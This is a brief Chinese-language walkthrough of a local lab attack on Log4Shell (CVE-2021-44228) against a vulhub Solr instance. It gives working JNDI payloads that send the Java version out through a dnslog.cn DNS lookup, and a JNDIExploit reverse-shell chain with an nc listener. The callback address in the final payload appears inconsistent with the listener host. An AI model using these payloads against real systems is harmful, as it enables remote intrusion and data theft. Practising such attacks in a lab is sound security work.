参考链接:https://mp.weixin.qq.com/s/2COe2VwHuHDywwqtekkWQQ
本地靶场启动命令:
systemctl start docker
cd vulhub/log4j/CVE-2021-44228
docker-compose up -d
在DNSlog平台请求一个dns域名:
构造:
${jndi:dns://${sys:java.version}.example.com}
利用JNDI发送DNS请求的Payload:
http://192.168.101.128:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.apjaaf.dnslog.cn}
访问:
dnslog抓到的数据:
得到的版本信息: 1.8.3
反弹shell:
要使用命令:
先运行exp
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.139.175
Kali开启监听6666端口:
nc -lvvp 6666
访问连接:
http://192.168.101.128:8983/solr/admin/cores?action=${jndi:ldap://192.168.139.175:1389/Basic/ReverseShell/192.168.101.128/6666}
中转机记录::
反弹shell